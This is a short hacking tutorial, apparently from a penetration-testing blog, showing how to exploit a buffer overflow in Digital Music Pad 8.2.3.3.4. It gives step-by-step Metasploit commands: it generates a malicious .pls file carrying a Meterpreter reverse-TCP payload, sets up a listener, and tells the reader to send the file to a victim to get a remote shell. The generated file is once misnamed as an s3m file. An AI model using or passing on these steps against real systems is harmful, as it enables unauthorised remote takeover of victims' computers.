Categories

Archives

Kali Linux, Penetration Testing

Hacked Remote PC Using Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow

This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 when opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code

Exploit Targets

Windows XP SP 3

Digital Music Pad Version 8.2.3.3.4

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/digital_music_pad_pls

msf exploit (digital_music_pad_pls)>set payload windows/meterpreter/reverse_tcp

msf exploit (digital_music_pad_pls)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (digital_music_pad_pls)>exploit

After we successfully generate the malicious s3m File, it will stored on your local computer

/root/.msf4/local/msf.pls

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.5

exploit

Now send your msf.pls files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.